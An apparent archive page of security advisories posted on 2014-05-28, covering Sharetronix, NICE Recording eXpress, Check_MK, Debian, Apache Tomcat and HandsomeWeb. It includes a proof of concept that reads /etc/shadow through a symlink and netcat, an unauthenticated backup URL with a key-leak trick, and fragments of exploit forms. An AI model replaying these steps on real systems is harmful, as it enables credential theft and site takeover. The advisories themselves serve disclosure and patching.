Multiple vulnerabilities in Sharetronix

2014-05-28 Thread High-Tech Bridge Security Research
Advisory ID: HTB23214
Product: Sharetronix
Vendor: Blogtronix, LLC
Vulnerable Version(s): 3.3 and probably prior
Tested Version: 3.3
Advisory Publication:  May 7, 2014  [without technical details]
Vendor Notification: May 7, 2014 
Vendor Patch: May 27, 2014 
Public Disclosure: May 28, 2014 
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2014-3414, CVE-2014-3415
Risk Level: High 
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 
(AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in 
Sharetronix, which can be exploited to perform SQL injection and Сross-Site 
Request Forgery (CSRF) attacks against vulnerable application. A remote hacker 
can gain full control over the application. 


1) SQL Injection in Sharetronix: CVE-2014-3415

Input passed via the "invite_users[]" HTTP POST parameter to 
"/[group_name]/invite" URI is not properly sanitised before being used in SQL 
query. A remote attacker can send a specially crafted HTTP POST request and 
execute arbitrary SQL commands in application's database.

The following exploit code below creates a file "file.php" within the home 
directory of MySQL server with output of the "phpinfo()" PHP function in:


http://[host]/[group_name]/invite"; method="post" name="main">





The attacker must be registered and logged-in (the registration is open by 
default). The attacker also must initially create a group (action allowed by 
default), in our example the group name is "group_name".


2) Сross-Site Request Forgery (CSRF) in Sharetronix: CVE-2014-3414

The vulnerability exists due to insufficient validation of HTTP request origin. 
A remote attacker can trick a logged-in administrator to open a web page with 
CSRF exploit and grant administrative privileges to arbitrary existing user of 
the vulnerable application. The registration is open by default. 

The following CSRF exploit below grants administrative privileges to the user 
"username":


http://[host]/admin/administrators"; method="post" name="main">




document.main.submit();




---

Solution:

Update to Sharetronix 3.4

More Information:
http://developer.sharetronix.com/download

---

References:

[1] High-Tech Bridge Advisory HTB23214 - 
https://www.htbridge.com/advisory/HTB23214 - Multiple vulnerabilities in 
Sharetronix.
[2] Sharetronix - http://sharetronix.com/ - Sharetronix is a Secure Social 
Network for Your Company.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



SEC Consult SA-20140528-0 :: Root Backdoor & Unauthenticated access to voice recordings in NICE Recording eXpress

2014-05-28 Thread SEC Consult Vulnerability Lab
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SEC Consult Vulnerability Lab Security Advisory < 20140528-0 >
===
  title: Root Backdoor & Unauthenticated access to voice recordings
product: NICE Recording eXpress voice recording solution
 (formerly called Cybertech eXpress, Cybertech Myracle
 maybe affected too)
 vulnerable version: 6.0.x, 6.1.x, 6.2.x, 6.3.x, 6.5.x
  fixed version: see section "Solution" and "Timeline" below
 impact: critical
   homepage: http://www.nice.com
  found: 2013-11-13
 by: Johannes Greil, Stefan Viehböck
 SEC Consult Vulnerability Lab
 https://www.sec-consult.com
===

Vendor & product description:
=
"NICE Systems (NASDAQ: NICE), is the worldwide leader of intent-based solutions
that capture and analyze interactions and transactions, realize intent, and
extract and leverage insights to deliver impact in real time."

source: http://www.nice.com/company-overview


"NICE provides Law Enforcement Agencies (LEAs) with mission-critical lawful
interception (LI) solutions to support the fight against organized crime, drug
trafficking and terrorist activities. NICE helps LEAs stay up-to-date with
fast-paced technology developments. The solutions retrieve target location,
relations and conversation content from any type of communication including
fax, fixed and mobile telephony, and Internet applications, resulting in a
multi-dimensional investigative picture. NICE solutions support the entire
lawful interception cycle, from warrant initiation to court evidence
presentation."

source: http://www.nice.com/lea


"NICE Recording eXpress is designed specifically for the audio recording needs
of the small and medium sized Public Safety organisation. This advanced
recording solution offers a comprehensive, advanced, easy-to-install and
affordable platform built for the Public Safety environment and Command and
Control operations delivering optimal recording functionality and quality
management."

Source:
http://www.nice.com/sites/default/files/nicerecordingexpress050112.pdf.pdf.pdf


Business recommendation:

Attackers are able to completely compromise the voice recording / surveillance
solution as they can gain access to the system and database level and listen to
recorded calls without prior authentication.

Furthermore, attackers would be able to use the voice recording server as a
jumphost for further attacks of the internal voice VLAN, depending on the
network setup.

It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.

It is assumed that further critical vulnerabilities exist.


Vulnerability overview/description:
===
Summary:
1) root backdoor account
   (REC-5180 SR1093984 - subtask REC-5424)

2) Unauthenticated access to sensitive files & voice recordings
   (REC-5179 SR1089608 - subtask REC-5417)

3) Low-privileged users can access other voice recordings & Insufficient
   authorization
   (REC-5179 SR1089608 - subtask REC-5418)

4) Unauthenticated access to functionality
   (REC-5179 SR1089608 - subtask REC-5419)

5) Insufficient authorization of admin functions
   (REC-5179 SR1089608 - subtask REC-5420)

6) Multiple cross site scripting issues
   (REC-5181 SR1093986 - subtask REC-5421)

7) Multiple unauthenticated SQL injection issues
   (REC-5180 SR1093984 - subtask REC-5423)

8) Insecure cookie handling
   (REC-5181 SR1093986 - subtask REC-5422)

9) Violation of least principle - services run as SYSTEM
   (not included in subtask)

The strings in parenthesis of the vulnerability title are the official bug
tracking number of NICE which is also referenced in their release notes.


1) root backdoor account (REC-5180 SR1093984 - subtask REC-5424)
- --
The MySQL database table "usr" contains a "root" user with USRKEY / user id 1
with administrative access rights. This user account does NOT show up within
the "user administration" menu when logged in as administrator user account in
the web interface. Hence the password can't be changed there.

As a side note: Password hashes are shown in the user administration menu for
each user within HTML source code.


2) Unauthenticated access to sensitive files & voice recordings (REC-5179
SR1089608 - subtask REC-5417)
- --
For example, unauthenticated attackers are able to gain access to e

LSE Leading Security Experts GmbH - LSE-2014-05-21 - Check_MK - Arbitrary File Disclosure Vulnerability

2014-05-28 Thread LSE Leading Security Experts GmbH (Security Advisories)

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-05-21 ===

Check_MK - Arbitrary File Disclosure Vulnerability
- --

Affected Versions
=
Linux versions of Check_MK equal or greater than commit
7e9088c09963cb2e76030e8b645607692ec56011 until Release v1.2.5i2p1.

Other platforms are not affected as the vulnerable feature is not
implemented there.

Issue Overview
==
Technical Risk: high
Likelihood of Exploitation: high
Vendor: Mathias Kettner GmbH
Credits: LSE Leading Security Experts GmbH employees
  Markus Vervier and Sascha Kettler
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-21.txt
Advisory Status: Public
CVE-Number: CVE-2014-0243

Issue Description
=
While conducting a whitebox test LSE Leading Security Experts GmbH
discovered that the Check_MK agent processes files from a directory
with mode 1777. It is not checked if the files are symbolic or hard
filesystem links.

As the Check_MK agent runs with root permissions by default, it will
read arbitrary files and readable devices with root permissions.

The directory mode 1777 was introduced on Sep 5 15:49:46 2013 +0200
in commit 7e9088c09963cb2e76030e8b645607692ec56011:

<<>>
commit 7e9088c09963cb2e76030e8b645607692ec56011
Author: Bernd Stroessenreuther 
Date:   Thu Sep 5 15:49:46 2013 +0200

mk-job: /var/lib/check_mk_agent/job directory is now
created with mode 1777 so mk-job can be used by
unprivileged users too: fixing bug #1040
<<>>

The vulnerable code in the agent for reading job results from
"/var/lib/check_mk_agent/job" is:

<<>>
# Get statistics about monitored jobs
if cd /var/lib/check_mk_agent/job; then
echo '<<>>'
head -n -0 -v *
fi
<<>>

Impact
==
A local user may create a symbolic link in the directory
"/var/lib/check_mk_agent/job", pointing to a file he normally would
not have access to like "/etc/shadow". The agent expects output from
jobs using the mk-job Tool in that directory. It will output the
content of all files in the directory on TCP port 6556 by default.

Temporary Workaround and Fix

LSE Leading Security Experts GmbH advises to remove the write
permissions and the sticky bit for non root users temporarily by
setting mode 755 on the directory.

Proof of Concept

[myhost]$ pwd
/var/lib/check_mk_agent/job
[myhost]$ ls -l
total 0
[myhost]$ ln -s /etc/shadow
[myhost]$ ls -la
total 4
drwxrwxrwt 2 root   root4096 May 21 15:17 .
drwxr-xr-x 3 root   root4096 Feb 26 13:54 ..
lrwxrwxrwx 1 myuser mygroup   11 May 21 15:17 shadow -> /etc/shadow
[myhost]$ nc 127.0.0.1 6556
[...]
<<>>
==> shadow <==
root:$6$[...]:16133:0:9:7:::
bin:*:15937:0:9:7:::
daemon:*:15937:0:9:7:::
adm:*:15937:0:9:7:::
lp:*:15937:0:9:7:::
sync:*:15937:0:9:7:::
shutdown:*:15937:0:9:7:::
halt:*:15937:0:9:7:::
mail:*:15937:0:9:7:::
uucp:*:15937:0:9:7:::
operator:*:15937:0:9:7:::
games:*:15937:0:9:7:::
gopher:*:15937:0:9:7:::
ftp:*:15937:0:9:7:::
nobody:*:15937:0:9:7:::
[...]

History
===
2014-05-20  Issue discovery
2014-05-21  Permission of customer for advisory
2014-05-21  Vendor informed
2014-05-22  CVE requested
2014-05-22  Vendor response
2014-05-22  CVE-2014-0243 assigned
2014-05-26  Official fix available
2014-05-27  Advisory release

- -- 
http://www.lsexperts.de
LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt
Tel.: +49 (0) 6151 86086-0, Fax: -299,
Unternehmenssitz: Weiterstadt, Amtsgericht Darmstadt: HRB8649
Geschäftsführer: Oliver Michel, Sven Walther
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.22 (FreeBSD)

iQIcBAEBAgAGBQJThYprAAoJEDgSCSGZ4yd8BgEP/07sJ4P4aByGKhCJmdmKo9+v
IdGPSYWqWp2Y2iIuE0J8zIkss0SHwU6bFa27h5pIplqUNDFiu4ycOlCpUkx0yh/F
z2DKxDGFQicegYHWj96Eagstj32P+vfo08yoLwxgC7vQawpbvTTM4edyunHUAuX9
r4Pb9Ia2OjFP+ePpP4Vp4HVHWEmO9kpEjm7irMvN+5Ft/fiMrrfafFXQk7/TO3Xr
jGyx+l/Hw0znGUWgRVPicaztpD72ZhYwYy1AC5mltXniqVDxP3xWjJMGrtwl4bW4
o+GWTdOn9sEV8V+quvAz9SLCvmGCghaakJqKYmzVLVP4+2I3M6mcu2l/1pl6M5jE
li+LScA9Fw6CwmUmk9gTduRTrHxcSWEzdRjrFll/Qh6DaU92YBTtfb5a7YCpFp+S
7Yf/ECA0BXTsfhY+M3CNUBSiJRCW6NQABIH/maOsK/u/Mq/gFcV0R/gd24YMIq1F
GzNzZPmNmGlqaZHcMijgdnJ9MKKxA/qLlhV4fAULafNq0fGz+gnp2H/CoJCLogLd
euJWtvcgqhOd5/m8O8YUi9pmyioHq7GNeN0oz+9MLurVKGZqilxCGaU1OLfSrwzx
z72qzSt3txs8+s72LGDMcw0/OOx0KYm3xYekzkRyOs4JkDOSIATAhvhSTbdp2myX
Kt8H8xrSmzdyUbTISR3E
=rbLP
-END PGP SIGNATURE-



[SECURITY] [DSA 2938-1] Availability of LTS support for Debian 6.0 / squeeze

2014-05-28 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2938-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
May 27, 2014   http://www.debian.org/security/faq
- -

The initial organisation and setup of Squeeze LTS has now happened and 
it is ready for taking over security support once the standard security 
support ends at the end of the month:


Information for users
=

Support for Squeeze LTS will end five years after the release of Squeeze, 
i.e. until the 6th of February 2016.

You need to enable the apt sources for squeeze-lts manually. 
Information on how to do this can be found at
https://wiki.debian.org/LTS/Development#Add_squeeze-lts_to_your_sources.list

You should also subscribe to the new annoucement mailing list for 
security updates for squeeze-lts:
https://lists.debian.org/debian-lts-announce/

A few packages are not covered by the Squeeze LTS support. These can be
detected with the new tool debian-security-support. Information on how
to run it can be found here:
https://wiki.debian.org/LTS/Development#Check_for_unsupported_packages

If debian-security-support detects an unsupported package which is 
critical to you, please get in touch with debian-...@lists.debian.org
(see below).

squeeze-backports will continue to be supported for the lifetime of 
Squeeze LTS.



Information for Debian maintainers
==

First of all, Debian package maintainers are not expected to work on 
updates of their packages for squeeze-lts. Package updates for 
squeeze-lts will be handled by the Debian LTS team.

However, if you _are_ interested in doing so (and the maintainer always
knows best on a package), you're certainly welcome to do so; everyone
in the Debian.org and Debian maintainers key ring can upload to the 
squeeze-lts suite. Information on how to upload a fixed package can 
be found at https://wiki.debian.org/LTS/Development#Upload_Packages



Mailing lists
=

The whole coordination of the Debian LTS effort is handled through the
debian-lts mailing list: https://lists.debian.org/debian-lts/

Please subscribe or follow us via GMANE (gmane.linux.debian.devel.lts)

Aside from the debian-lts-announce list, there's also a list for 
following all uploads in debian-lts: 
https://lists.debian.org/debian-lts-changes/



Security Tracker


All information on the status of vulnerabilities (e.g. if the version in 
squeeze-lts happens to be unaffected while wheezy is affected) will be 
tracked in the Debian Security Tracker:  

http://security-tracker.debian.org

If you happen to spot an error in the data, please see 
https://security-tracker.debian.org/tracker/data/report


Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBAgAGBQJThKRGAAoJEBDCk7bDfE42iCIQALY7814rCMM4ctvKLFbrFQy6
eYUBXob1PHKaYwf3ISZOAIVwqsFszvDfeLjI7gt0PN0HC6jpc5ephxbZDvk3jdVU
+VNEnrTd8StHE/M+Cj2lC6Mh27h8jn1FeS1rVMbG1CYNa9wo6BiR5pENKPeuLG3M
M54rrOCwtNQHFhbNrQ4m+RiOrQI62fTqGg1e0RXvBqXAdj4kc0dL9B9W4WUwhhtq
yaxjJVtk5847fSn3DuQbi/SbumTuiOb7BUMWixfUAM9IMODVn/I8TNKTcsAZAmY7
3Vz8LXjYV43/zkw69t8G8lEjkXovv+H4mrvShbtEAojCjL9WS5DCZViyiFNrDxu9
KK9EkbYEuTHv8Evgd42RPHwjt5Kw8KXwOr4LRX856Ti0gQj4rDQrDAM4L3hyXXFc
Gdhqa7VXSXX4TIS0zrrXkSZhG77zDvmQJibAtivMUafvU9BKx8Cc7tmJ5lxje6Sn
TbGrM62Pgou7F7AlLGl96cOijT8afEm+U2YUdtNgnqR3Z7kUWOhVDi217nwZk61z
Au7NwGmALtzbqlKArsWKK4JNKgUE1HrdgPGvKcsCFN5PlXK45u5HiQxH8jVjURIc
QV/VjqXE3OK3wOkx5XKeUNxKO9RlHxqKbI12PxhsR6yiBbZjMwN+PV2XlvOZ6in3
n0jz78yJ4H8u+R7milPO
=EG+m
-END PGP SIGNATURE-



[SECURITY] [DSA 2937-1] mod-wsgi security update

2014-05-28 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2937-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
May 27, 2014   http://www.debian.org/security/faq
- -

Package: mod-wsgi
CVE ID : CVE-2014-0240 CVE-2014-0242

Two security issues have been found in the Python WSGI adapter module 
for Apache:

CVE-2014-0240

Robert Kisteleki discovered a potential privilege escalation in
daemon mode. This is not exploitable with the kernel used in Debian
7.0/wheezy.

CVE-2014-0242

Buck Golemon discovered that incorect memory handling could lead to
information disclosure when processing Content-Type headers.

For the oldstable distribution (squeeze), these problems have been fixed in
version 3.3-2+deb6u1.

For the stable distribution (wheezy), these problems have been fixed in
version 3.3-4+deb7u1.

For the testing distribution (jessie), these problems have been fixed in
version 3.5-1.

For the unstable distribution (sid), these problems have been fixed in
version 3.5-1.

We recommend that you upgrade your mod-wsgi packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBAgAGBQJThKJYAAoJEBDCk7bDfE42pQAP/1timmRSoJfdYXoYM/3wCeTH
CQGd9/4TmKeZc7bzWeaQfsLYfWgeicS+y3hPuZBMKdr4jX0r40AQ9j2zhiHG+WvM
jkpiLfuhvPpRY45Umll4xwRdfORpAr2ZN/H8ebohBOF6PAY4XZfr4tl0AgzqLPc+
s9wvff5vlDI5QBWuqWpXm4NXKlRtANqeTlPK3fvJJecJn74shv1PHpRqAVZzUA4J
KYaVrnIZFz5FQm8X2n+1VeAPaZb+UU/otqKdqkUit9lcld2nB6Zq1cqiFGO2sNVU
zO3aIj/nsrCJwIS2+3GhNAbjVbh9nz1c3ZAg0WFBr0CbrIHrA7mLIuHW3XYfXPKS
vF5JDxf6lnpRaJEEyoVUosm2fk3x/W8D91v4m1u92rgRSUF14nAv9XX745t8aZHn
VhzwFCwbaZgy0R2GbThs6rdAkVcKWNucCCX6WrjuEbp0HHCq8yEw7nkjCGY3lMj7
kRB6wm6iRcDIQCmClbLys/7Oq952TV6kLEs9XpD+rsyrHalkxqU/IZOhjwznLE3r
rCVZMrzlUPupgob2xnBc/688LnMIcq/UQkJCMqCHo7ER+lvVLoAc9o4yvMF76JSC
ZrbromVm51ZMFRuFD6kDjQFxrYBYt/QVAGeRrGCHkES8nm8l0x2g0QS61KXBh8V9
y+bcSiwTu8URJpnL32Ub
=wcoD
-END PGP SIGNATURE-



Re: [SECURITY] CVE-2014-0099 Apache Tomcat information disclosure

2014-05-28 Thread Mark Thomas
CORRECTION: This is CVE-2014-0099 *NOT* -0097
Apologies for the typo

On 27/05/2014 13:46, Mark Thomas wrote:
> CVE-2014-0099 Information Disclosure
> 
> Severity: Important
> 
> Vendor: The Apache Software Foundation
> 
> Versions Affected:
> - Apache Tomcat 8.0.0-RC1 to 8.0.3
> - Apache Tomcat 7.0.0 to 7.0.52
> - Apache Tomcat 6.0.0 to 6.0.39
> 
> Description:
> The code used to parse the request content length header did not check
> for overflow in the result. This exposed a request smuggling
> vulnerability when Tomcat was located behind a reverse proxy that
> correctly processed the content length header.
> 
> Mitigation:
> Users of affected versions should apply one of the following mitigations
> - Upgrade to Apache Tomcat 8.0.5 or later
>   (8.0.4 contains the fix but was not released)
> - Upgrade to Apache Tomcat 7.0.53 or later
> - Upgrade to Apache Tomcat 6.0.41 or later
>   (6.0.40 contains the fix but was not released)
> 
> Credit:
> A test case that demonstrated the parsing bug was sent to the Tomcat
> security team but no context was provided. The security implications
> were identified by the Tomcat security team .
> 
> References:
> [1] http://tomcat.apache.org/security-8.html
> [2] http://tomcat.apache.org/security-7.html
> [3] http://tomcat.apache.org/security-6.html
> 
> -
> To unsubscribe, e-mail: security-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: security-h...@tomcat.apache.org
> 



[SECURITY] CVE-2014-0119 Apache Tomcat information disclosure

2014-05-28 Thread Mark Thomas
CVE-2014-0119 Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.5
- Apache Tomcat 7.0.0 to 7.0.53
- Apache Tomcat 6.0.0 to 6.0.39

Description:
In limited circumstances it was possible for a malicious web application
to replace the XML parsers used by Tomcat to process XSLTs for the
default servlet, JSP documents, tag library descriptors (TLDs) and tag
plugin configuration files. The injected XMl parser(s) could then bypass
the limits imposed on XML external entities and/or have visibility of
the XML files processed for other web applications deployed on the same
Tomcat instance.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.8 or later
  (8.0.6 and 8.0.7 contain the fix but were not released)
- Upgrade to Apache Tomcat 7.0.54 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
This issue was identified by the Tomcat security team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html


CVE-2014-3445 - Unauthenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages

2014-05-28 Thread Portcullis Advisories
Vulnerability title: Unauthenticated Backup and Password Disclosure in
HandsomeWeb SOS Webpages
CVE: CVE-2014-3445
Vendor: HandsomeWeb
Product: SOS Webpages
Affected version: 1.1.11 and earlier
Fixed version: 1.1.12
Reported by: Freakyclown

Details:

The default setup allows an unauthenticated user to access
administrative functions such as backing up of key files within the CMS.
This is done by appending the following to a domain using the software
affected.

/backup.php?a=2&k=6f15afa1ac4edea0g145e884116334b7

Where "a" is the file number to back up and "k" is the MD5key used to
authenticate the administrator, however if "k" does not match the
correct key rather than disallowing the unauthenticated user to back up
the file the service will provide the user with the correct key. For
example:

Failure, wrong key. The right key is 5f17aca1ae2edea0f145e884116371a5

Using this new key in the url such as below:
/backup.php?a=2&k=5f17aca1ae2edea0f145e884116371a5

Will allow the user to perform the backup of files.

In addition to this the key is generated by the code:
$backupkey=MD5

Making it trivial to decrypt the key provided above to gain the
administrators password and gain further control over the site.


Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.


[SECURITY] CVE-2014-0097 Apache Tomcat information disclosure

2014-05-28 Thread Mark Thomas
CVE-2014-0097 Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.3
- Apache Tomcat 7.0.0 to 7.0.52
- Apache Tomcat 6.0.0 to 6.0.39

Description:
The code used to parse the request content length header did not check
for overflow in the result. This exposed a request smuggling
vulnerability when Tomcat was located behind a reverse proxy that
correctly processed the content length header.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)
- Upgrade to Apache Tomcat 7.0.53 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
A test case that demonstrated the parsing bug was sent to the Tomcat
security team but no context was provided. The security implications
were identified by the Tomcat security team .

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html


[SECURITY] CVE-2014-0095 Apache Tomcat denial of service

2014-05-28 Thread Mark Thomas
CVE-2014-0095 Denial of Service

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC2 to 8.0.3

Description:
A regression was introduced in  revision 1519838 that caused AJP
requests to hang if an explicit content length of zero was set on the
request. The hanging request consumed a request processing thread which
could lead to a denial of service.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)

Credit:
This issue was reported as a possible bug via the Tomcat users mailing
list and the security implications were identified by theTomcat security
team.

References:
[1] http://tomcat.apache.org/security-8.html


[SECURITY] CVE-2014-0096 Apache Tomcat information disclosure

2014-05-28 Thread Mark Thomas
CVE-2014-0096 Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.3
- Apache Tomcat 7.0.0 to 7.0.52
- Apache Tomcat 6.0.0 to 6.0.39

Description:
The default servlet allows web applications to define (at multiple
levels) an XSLT to be used to format a directory listing. When running
under a security manager, the processing of these was not subject to the
same constraints as the web application. This enabled a malicious web
application to bypass the file access constraints imposed by the
security manager via the use of external XML entities.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)
- Upgrade to Apache Tomcat 7.0.53 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
This issue was identified by the Tomcat security team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html


[SECURITY] CVE-2014-0075 Apache Tomcat denial of service

2014-05-28 Thread Mark Thomas
CVE-2014-0075 Denial of Service

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.3
- Apache Tomcat 7.0.0 to 7.0.52
- Apache Tomcat 6.0.0 to 6.0.39

Description:
It was possible to craft a malformed chunk size as part of a chucked
request that enabled an unlimited amount of data to be streamed to the
server, bypassing the various size limits enforced on a request. This
enabled a denial of service attack.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)
- Upgrade to Apache Tomcat 7.0.53 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
This issue was reported to the Tomcat security team by David Jorm of the
Red Hat Security Response Team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html